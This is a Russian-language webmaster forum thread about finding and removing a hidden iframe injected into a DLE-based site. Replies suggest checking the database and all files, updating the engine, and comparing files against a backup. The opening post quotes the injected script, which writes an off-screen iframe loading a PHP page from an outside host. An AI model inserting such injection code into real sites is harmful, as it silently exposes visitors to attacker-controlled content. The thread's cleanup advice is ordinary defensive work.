Ифрейм на дле повесили - как удалить?

M1
На сайте с 07.02.2009
Offline
105
582

Здравствуйте. Сайт на дле.

Повесили вот такой ифрейм

"document.write("<iframe style='position:absolute; top: -200px;' src=http://opqdehjow.wha.la/slb.php?i=25659></iframe>");"

Никак не могу понять где его найти. Хелп ми :)

siv1987
На сайте с 02.04.2009
Offline
427
#1

В бд, в шаблонах, в скриптах...

Makedo
На сайте с 19.08.2010
Offline
49
#2

Как правило вешают в шапку.

Вариативное будущее (https://protaro.info)
trahtor
На сайте с 06.12.2005
Offline
405
#3

В файлах сайта или в бд ищите. Ваш кэп.

R
На сайте с 24.01.2008
Offline
180
#4

Все верно сказали что искать нужно в Бд и в файлах, так же не забывайте и про источник, т.е. как поставили заразу.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
lutskboy
На сайте с 22.11.2013
Offline
172
#5

и движок обновите

M1
На сайте с 07.02.2009
Offline
105
#6

Бд проверил, не нашел ничего. В файлах каких именно? Во всех?

siv1987
На сайте с 02.04.2009
Offline
427
#7

Во всех.

Прежде чем искать, сначала нужно определится что вы собираетесь искать - код может быть закодированным, может подружатся с стороннего сервера и тд. Поэтому читаем внимательно прикрепленную ему целиком в разделе "Безопасность". Про вирусы в дле также есть куча других тем, где все уже обсуждалось по 1000 раз. Или обратитесь к спецам, они знают что искать и где искать.

N1
На сайте с 14.05.2009
Offline
83
#8

Самый быстрый и простой способ:

- берем старый бекап в одну папку

- скачиваем весь сайт в другую папку

- сравниваем в Total Commander папки по содержимому

Не забываем про картинки, там тоже тело шела может сидеть.

Если архива нет, то использовать хотя бы инсталяшку cms той же версии .

Искать по вхождению видимого html практически бесполезно - обсфукация или тянет с другого сайта. Последние заражения что видел ни base64 и strrev не содержали.

Т.е. готовых схем нет, нужно анализировать выполнение скрипта, ставить ловушки, выявить место после которого появился посторонний контент и провериять файлы визуально.

Оптимизатор широкого профиля

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий